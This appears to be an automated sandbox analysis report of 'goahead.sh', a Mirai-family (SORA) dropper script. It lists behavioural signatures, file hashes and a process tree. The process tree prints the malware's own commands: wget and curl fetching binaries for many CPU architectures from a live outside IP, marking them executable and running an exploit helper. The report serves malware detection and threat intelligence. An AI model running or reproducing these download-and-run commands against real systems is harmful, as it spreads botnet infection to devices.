Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
03-11-2024 14:37
Static task
static1
Behavioral task
behavioral1
Sample
goahead.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
goahead.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
goahead.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
goahead.sh
-
Size
2KB
-
MD5
2f155262711b3b5d224e0c947ff75981
-
SHA1
27318f291143b656c7d945d6f41d90e23d114562
-
SHA256
51e04d56632e0465248dbfdd5145d27c3b9e66c4a38f787c52ddf3a193ec2c91
-
SHA512
92d179867cb380e4948d702d0d9c90d7c6c288e0bb8ac8e97b512f848108e5b97b10fc02c38b5c8b7a57b446d53c1b46710ddd68e0d9ae9854366efd0e8d9d44
Malware Config
Extracted
mirai
SORA
Signatures
-
Mirai family
-
Contacts a large (47125) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 851 chmod 746 chmod 773 chmod 825 chmod 875 chmod 881 chmod 887 chmod 799 chmod 819 chmod 831 chmod 739 chmod 757 chmod 892 chmod 898 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 740 robben /tmp/robben 747 robben /tmp/robben 758 robben /tmp/robben 775 robben /tmp/robben 801 robben /tmp/robben 820 robben /tmp/robben 826 robben /tmp/robben 833 robben /tmp/robben 853 robben /tmp/robben 876 robben /tmp/robben 882 robben /tmp/robben 888 robben /tmp/robben 893 robben /tmp/robben 899 robben -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben -
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-4.dat upx behavioral3/files/fstream-5.dat upx behavioral3/files/fstream-7.dat upx -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself chcjp22jmk1be1j 747 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/709/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/669/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/719/exe robben File opened for reading /proc/862/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/424/exe robben File opened for reading /proc/665/exe robben File opened for reading /proc/672/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/713/exe robben File opened for reading /proc/751/exe robben File opened for reading /proc/671/exe robben File opened for reading /proc/687/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/707/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/882/exe robben File opened for reading /proc/748/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/797/exe robben File opened for reading /proc/890/exe robben File opened for reading /proc/710/exe robben File opened for reading /proc/702/exe robben File opened for reading /proc/798/exe robben File opened for reading /proc/879/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 745 cat 742 wget 744 curl -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.ppc440fp curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/robben goahead.sh File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.i686 wget
Processes
-
/tmp/goahead.sh/tmp/goahead.sh1⤵
- Writes file to tmp directory
PID:713 -
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x862⤵
- Writes file to tmp directory
PID:717
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/catcat sora.x862⤵PID:738
-
-
/bin/chmodchmod +x goahead.sh robben sora.x86 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:740
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:745
-
-
/bin/chmodchmod +x goahead.sh robben sora.mips sora.x86 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:747
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:754
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/catcat sora.x86_642⤵PID:756
-
-
/bin/chmodchmod +x goahead.sh robben sora.mips sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:758
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i4682⤵PID:760
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/catcat sora.i4682⤵PID:772
-
-
/bin/chmodchmod +x goahead.sh robben sora.i468 sora.mips sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:775
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i6862⤵
- Writes file to tmp directory
PID:777
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/catcat sora.i6862⤵PID:797
-
-
/bin/chmodchmod +x goahead.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:801
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:803
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/catcat sora.mpsl2⤵PID:818
-
-
/bin/chmodchmod +x goahead.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:820
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm42⤵PID:822
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/catcat sora.arm42⤵PID:824
-
-
/bin/chmodchmod +x goahead.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:826
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm52⤵
- Writes file to tmp directory
PID:827
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/catcat sora.arm52⤵PID:829
-
-
/bin/chmodchmod +x goahead.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:833
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm62⤵
- Writes file to tmp directory
PID:835
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/catcat sora.arm62⤵PID:850
-
-
/bin/chmodchmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-p01qrj2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:853
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm72⤵
- Writes file to tmp directory
PID:855
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/catcat sora.arm72⤵PID:874
-
-
/bin/chmodchmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:876
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:878
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/catcat sora.ppc2⤵PID:880
-
-
/bin/chmodchmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:882
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc440fp2⤵PID:884
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc440fp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/catcat sora.ppc440fp2⤵PID:886
-
-
/bin/chmodchmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:888
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:889
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/catcat sora.m68k2⤵PID:891
-
-
/bin/chmodchmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:893
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.sh42⤵
- Writes file to tmp directory
PID:895
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/catcat sora.sh42⤵PID:897
-
-
/bin/chmodchmod +x goahead.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:899
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5fa5457b7546c1b7060c30bde3f8649ca
SHA17c75f6463c36eaebc4719f47d8047e5195a85057
SHA256d3f2f30efffec0f49e28199c60b2819a3e831ae0ba920abd2c5ece5e4bfb3adf
SHA512f012d61a479015af70447b1c3bd2a48c2977691f9a180f4f5c3340b034c65d69782299cb8459e92e3a18dcadfa3078c8b1c613593170f9fa95dd53ba36050c21
-
Filesize
28KB
MD5ec332610b0ca5b634c097ed14f42eedc
SHA1abcbd111601f4165c400e9db36fbf20339e37170
SHA2562bfdc588e26d5f6ac54ca3330ced3ab2bfc9bafb98cdd91fd017180dd5848b3a
SHA512f41f54e2aca4a5dfa3d7bcbad45963aa943fa3b6536c34f7c92c7c79894f1009ef5ab13cfed39b74ffc614791b77497689bcbe71edfefecb20497d873c92d1b0
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5d356657b6ea7a715b60217a914eb6ca8
SHA1b276b1a91895c3025e9f9d64227205dac79c8ef6
SHA256b0758e5e7fde30404ec43dd5fba21253735464062e8a10f0876193d18194fe22
SHA5123b0ab5d1282c9d2ea18ed0fc78aeabafde6c16fa094d53d39a67d3316482da0cffa444dd5dc14aeefb547ce2f789480caa5bb514cb4a26787c7441ba8862e262
-
Filesize
64KB
MD5fb3d051f41bd7347aeff64980f2d100b
SHA15261ff91b8d99d6b8f5f647e33aad29b90cee973
SHA25619f4b46d738fa23ff571db081cea0bf34509b9799de2116853e77691faaebec1
SHA51282dd9805571030fc4a56a8d5838f5ee3fe1b162f059c905a48f37abcc4dc58442e1e909ab4a2352d690af8ac306eafe4d89cb87f37baec8a8136d48e884be4dd
-
Filesize
27KB
MD500eff503439515d9b12b9c068367cb80
SHA182d68f2b1ffca8558458c1b858599542a67d8bbf
SHA2562962b987b00b166299f9a73f7ccb8dc02b4208266465b41f6b1c9c28277d7276
SHA5123800bc5a8f3983fc50813c49c906203af6528ff3eb97b4818a8632085562c25eab1c691edb5dcdc96c8d2c3f25784a41897ec8a52c042d391899a310224d50f5